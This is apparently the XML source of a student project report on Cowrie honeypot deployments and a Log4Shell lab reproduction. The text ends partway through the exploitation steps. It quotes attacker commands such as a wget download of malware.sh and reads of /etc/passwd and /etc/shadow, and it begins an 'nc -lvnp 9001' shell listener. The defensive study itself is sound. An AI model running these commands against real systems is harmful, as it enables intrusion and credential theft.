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</w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Threat Intelligence, SOC Monitoring &amp; Vulnerability Assessment Using Honeypot-Based Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submitted by: [Your Name] &amp; [Teammate Name]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Course / Program: MCA / PG Diploma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Date: July 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project implements a complete cybersecurity attack-detection lifecycle by combining three disciplines: threat intelligence, security operations (SOC) monitoring, and vulnerability assessment / penetration testing (VAPT).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Cowrie honeypot was deployed in two environments — a controlled local lab and a public AWS EC2 instance — to capture both simulated and genuine, real-world attacker behavior. Captured logs were analyzed using a custom Python pipeline to extract attack patterns, commonly used credentials, and attacker command sequences. Separately, the CVE-2021-44228 (Log4Shell) vulnerability was reproduced and successfully exploited against a deliberately vulnerable Apache Solr instance (via Vulhub), demonstrating that the categories of attack technique observed on the honeypot correspond to real, exploitable weaknesses in production software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within approximately 24 hours of public deployment, the cloud honeypot recorded connection attempts from 9 distinct internet-facing IP addresses and one successful unauthorized login using automated credential-guessing — confirming that internet-exposed systems face constant, automated attack attempts even without any targeted campaign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Objectives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Deploy and configure a honeypot to capture real-world and simulated cyberattack data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Analyze captured logs to extract threat intelligence — attack patterns, credentials used, attacker commands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Apply SOC-style detection logic to identify brute-force attempts, successful intrusions, and suspicious commands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Reproduce and exploit a real, high-severity vulnerability (Log4Shell) to validate real-world exploitability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Document findings and provide actionable security recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Tools &amp;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D9E2F3" w:val="clea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6240"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Cowrie (SSH/Telnet honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Containerization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Cloud Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">AWS EC2 (Ubuntu Server, t2.micro)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Attacker Toolkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Kali Linux (via WSL2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Brute-Force Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Vulnerable Target (VAPT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Vulhub — Apache Solr 8.11.0 (CVE-2021-44228 / Log4Shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Data Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Python (JSON log parsing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Visualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6240"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Matplotlib</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Project Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two honeypot deployments were run in parallel to compare simulated vs. real-world attacker behavior, alongside an independent VAPT exercise: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Local Cowrie honeypot (Docker, on Kali/WSL2) — attacked manually and via Hydra to generate controlled, varied attack sessions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Cloud Cowrie honeypot (Docker, on AWS EC2, public IP, all inbound ports open) — exposed to genuine internet scanning and attack traffic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Vulhub Apache Solr environment (Docker, local) — used to reproduce and exploit CVE-2021-44228 (Log4Shell)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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: Architecture diagram — Attacker (Kali) → Local Honeypot / Cloud Honeypot / Vulhub Target → Logs → Python Analysis ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Part 1 — Local Honeypot: Simulated Attack Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The local Cowrie honeypot was attacked manually across multiple sessions using different simulated 'attacker personas' (root, admin, test, ubuntu), combined with an automated Hydra brute-force run, to generate a realistic and varied dataset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Summary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D9E2F3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960"/>
            <w:shd w:fill="D9E2F3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5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Total log entries captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Total connection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Unique source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1 (local test machine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Successful logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Failed logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Total commands executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Unique sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">File download events captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Top Usernames &amp; Passwords Attempted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r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passwords tried included common/weak values such as 12345, password, 123456789, and admin — consistent with real-world credential-stuffing patterns observed on internet-facing systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Notable Captured Behavior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simulated attacker session executed reconnaissance commands: whoami, uname -a, ls -la, cat /etc/passwd, ps aux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file download was captured and hashed: wget http://example.com/malware.sh — Cowrie logged the SHA-256 of the retrieved file, demonstrating how a honeypot can capture payload artifacts for further malware analysis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 separate session simulated privilege-escalation attempts: sudo su, cat /etc/shadow, netstat -tulnp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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_event_types.png — Event type breakdown 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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_usernames.png — Top usernames tried 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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_passwords.png — Top passwords tried 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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_commands.png — Most common commands executed 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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_timeline.png — Timeline of connection attempts ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Part 2 — Cloud Honeypot: Real-World Attack Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The same Cowrie honeypot software was deployed on a public AWS EC2 instance with all inbound ports open, exposing it directly to internet scanning and attack traffic. Unlike the local deployment, every connection recorded here originated from a genuine, independent source on the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Summary Statistics (approx. 24-hour collection window)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D9E2F3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960"/>
            <w:shd w:fill="D9E2F3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5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Total log entries captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Total connection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Unique source IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">9 (multiple countries)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Successful logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Failed logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">0 (attacker succeeded on first observed attempt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Malformed / bad-protocol connection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">2+ (automated scanner behavior)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Key Finding — Real Unauthorized Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A real, automated attacker successfully authenticated to the honeypot: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5760"/>
            <w:shd w:fill="D9E2F3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600"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">K3sXpvE1rZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">111.229.161.160</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">SSH client fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">russh_0.51.1 (automated tool, not a manual client)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">2026-07-28T19:47:26Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SSH client signature (russh) indicates this was an automated bot — most likely part of a botnet performing internet-wide credential-guessing — rather than a manual, targeted attack. This confirms that internet-exposed systems are attacked continuously by automated tooling, independent of any specific targeting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Additional Observations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Several connections showed malformed SSH handshakes and even a TLS ClientHello sent to the SSH port — evidence of broad, non-selective internet-wide scanning rather than manual attacks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Attacker source IPs spanned multiple countries and autonomous systems, consistent with distributed scanning infrastructure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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_event_types_CLOUD.png — Event type breakdown (cloud) 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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_usernames_CLOUD.png — Usernames tried (cloud) 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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_passwords_CLOUD.png — Passwords tried (cloud) ]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20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: chart_timeline_CLOUD.png — Attack timeline (cloud) ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Part 3 — VAPT: Exploiting a Real Vulnerability (Log4Shell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To validate that the categories of attack technique observed on the honeypot correspond to real, exploitable weaknesses, the team reproduced CVE-2021-44228 ("Log4Shell") — one of the most critical vulnerabilities disclosed in the last decade — against a deliberately vulnerable Apache Solr 8.11.0 instance (Log4j 2.14.1), deployed via the Vulhub project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Vulnerability Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log4j is a widely used Java logging library. Affected versions fail to sanitize user-controllable input before passing it through JNDI lookups, meaning any logged string can trigger a lookup against an attacker-controlled server — potentially resulting in full remote code execution. The flaw affected major frameworks including Apache Solr, Struts2, and Druid, and was assessed as maximum severity (CVSS 10.0).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Exploitation Steps Performed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00"/>
        <w:gridCol w:w="3360"/>
      </w:tblGrid>
      <w:tr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5100"/>
            <w:shd w:fill="D9E2F3" w:val="clea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3360"/>
            <w:shd w:fill="D9E2F3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900"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">docker compose up -d (Vulhub Log4j/Solr environment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Deploy the vulnerable Solr 8.11.0 target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">nc -lvnp 9001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
